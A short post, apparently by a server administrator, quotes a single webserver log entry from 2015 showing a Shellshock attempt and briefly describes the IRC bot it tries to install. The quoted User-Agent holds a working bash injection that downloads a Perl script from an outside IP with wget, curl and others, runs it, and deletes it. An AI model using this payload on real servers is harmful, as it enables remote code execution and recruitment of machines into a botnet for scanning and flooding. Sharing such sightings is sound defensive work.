While strolling through the webserver-logs, I found this little asshole..:
78.25.80.226 - - [16/Aug/2015:21:35:01 +0200] "GET /suspendedpage.cgi HTTP/1.1" 404 494 "-" "() { :;}; /bin/bash -c \"cd /tmp;wget http://189.11.9.243/fix.pl;curl -O http://189.11.9.243/fix.pl;fetch http://189.11.9.243/fix.pl;lwp-download http://189.11.9.243/fix.pl;perl fix.pl;rm -rf fix.pl;rm -rf fix.pl*\""
fix.pl installs an irc-connection and waits for commands like
portscan, tcpflood or a reverse shell ..
Looks like there are still servers out there which are vulnerable to shellshock ..